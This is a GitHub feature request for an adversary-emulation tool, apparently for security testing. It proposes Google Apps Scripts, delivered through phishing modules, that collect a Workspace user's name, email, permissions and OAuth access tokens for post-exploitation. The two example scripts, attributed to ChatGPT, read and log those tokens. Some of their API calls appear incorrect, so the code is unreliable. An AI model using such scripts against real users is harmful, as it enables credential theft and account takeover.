[Feature Request] Add Google AppScripts for use with Phishing Payload and Email Modules

Google App Scripts

Initial Access SWAT collection script

Collect necessary credential data to enable the use of SWAT to conduct post exploitation actions.

Requirements if user is a Google Workspace Admin:
- Google Admin SDK API enabled

Collect:
- Account name
- Email address
- Account permissions 
- App access tokens
- Oauth Tokens

ChatGPT Example Script:

Google Workspace Admin

    function getAccountInfo() {
    var email = Session.getActiveUser().getEmail();
    var account = AdminDirectory.Users.get(email);
    var accountName = account.name.fullName;
    var accountPermissions = AdminDirectory.Users.getImapSettings(email).accessibility;
    var appAccessTokens = AdminDirectory.Users.getOAuth2Tokens(email).items;
    var oAuthTokens = AdminDirectory.Users.getOAuth2Tokens(email).items;

    Logger.log("Account Name: " + accountName);
    Logger.log("Email Address: " + email);
    Logger.log("Account Permissions: " + accountPermissions);
    Logger.log("App Access Tokens: " + appAccessTokens);
    Logger.log("OAuth Tokens: " + oAuthTokens);
}

Google Workspace Non-Admin

function getUserInfo() {
  var user = Session.getActiveUser();
  var email = user.getEmail();
  var name = user.getUsername();
  var accessToken = ScriptApp.getOAuthToken();
  var appAccessToken = ScriptApp.getAuthorizationInfo('https://www.googleapis.com/auth/script.external_request').getAccessToken();
  var userInfo = {
    'name': name,
    'email': email,
    'accessToken': accessToken,
    'appAccessToken': appAccessToken
  };
  Logger.log(userInfo);
}

elastic / SWAT

[Feature Request] Add Google AppScripts for use with Phishing Payload and Email Modules #10

Google App Scripts